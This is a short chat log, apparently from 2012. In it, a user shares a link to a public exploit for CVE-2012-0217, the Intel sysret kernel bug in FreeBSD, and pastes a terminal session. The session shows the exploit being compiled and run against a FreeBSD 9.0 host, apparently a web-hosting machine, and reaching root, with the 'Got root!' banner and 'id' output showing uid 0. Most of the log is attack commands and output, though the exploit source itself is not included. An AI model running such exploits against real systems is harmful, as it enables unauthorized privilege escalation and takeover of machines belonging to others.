http://www.youtube.com/watch?v=IbssRVgr2K4
[12/18/12 12:50:10 PM] fishka975:
https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sys
_FreeBSD.c
[12/18/12 12:54:46 PM] fishka975: [fish@VKTR080 ~/sites/woch.com/exploit]$ gcc -o run 1.c
[fish@VKTR080 ~/sites/woch.com/exploit]$ ls -ltar
total 37
drwxr-xr-x 9 fish wheel 1536 Dec 18 11:51 ..
-rw-r--r-- 1 fish wheel 11180 Dec 18 11:53 1.c~
-rw-r--r-- 1 fish wheel 11181 Dec 18 11:54 1.c
-rwxr-xr-x 1 fish wheel 11684 Dec 18 11:54 run
drwxr-xr-x 2 fish wheel 512 Dec 18 11:54 .
[fish@VKTR080 ~/sites/woch.com/exploit]$ ./run
CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*] Retrieving host information...
[+] CPU: GenuineIntel
[+] sysname: FreeBSD
[+] release: 9.0-RELEASE
[+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012
root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
[+] machine: amd64
[*] Validating target OS and version...
[+] Vulnerable :-)
[*] Resolving kernel addresses...
[+] Resolved Xofl to 0xffffffff80b02e70
[+] Resolved Xbnd to 0xffffffff80b02ea0
[+] Resolved Xill to 0xffffffff80b02ed0
[+] Resolved Xdna to 0xffffffff80b02f00
[+] Resolved Xpage to 0xffffffff80b03240
[+] Resolved Xfpu to 0xffffffff80b02fc0
[+] Resolved Xalign to 0xffffffff80b03080
[+] Resolved Xmchk to 0xffffffff80b02f60
[+] Resolved Xxmm to 0xffffffff80b02ff0
[*] Setup...
[+] Trigger code...
[+] Trampoline code...
[*] Fire in the hole!
[*] Got root!
[fish@VKTR080 ~/sites/woch.com/exploit]$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
[fish@VKTR080 ~/sites/woch.com/exploit]$
[12/18/12 12:54:48 PM] fishka975: пиздетц